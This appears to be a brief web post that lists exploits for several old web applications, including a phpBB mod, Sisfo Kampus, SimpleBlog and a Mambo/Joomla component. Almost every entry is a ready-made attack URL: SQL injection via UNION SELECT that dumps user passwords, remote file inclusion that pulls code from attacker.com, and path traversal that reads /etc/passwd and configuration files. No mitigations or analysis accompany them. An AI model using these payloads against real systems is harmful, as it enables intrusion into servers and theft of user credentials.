Latest XSS and SQL Vulnerabilities

1. Hacks List phpBB Mod <= 1.21 Remote SQL Injection Vulnerability
http://[Target]/[Path]/admin/admin_hacks_list.php?mode=edit&hack_id=-99%20UNION%20SELECT%20
null,null,user_password,null,null,null,null,null,null,null,null,null%20
FROM%20phpbb_users%20Where%20user_id=2&sid=AdminHash

2. Sisfo Kampus <= 0.8 Remote File Inclusion / Download Vulnerabilities
http://www.victim.com/index.php?exec=http://attacker.com/evilcode.txt?
http://www.victim.com/print.php?print=http://attacker.com/evilcode.txt?
http://www.victim.com/index.php?exec=download&dir=/etc/passwd

3. SimpleBlog <= 2.3 (admin/edit.asp) Remote SQL Injection Vulnerability
http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users

4. com_flyspray Mambo Com. <= 1.0.1 Remote File Disclosure Vulnerability
http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=config.inc.php
http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=../../../../../etc/passwd%00

5. Cahier de texte V2.0 SQL Code Execution Exploit Bug
see here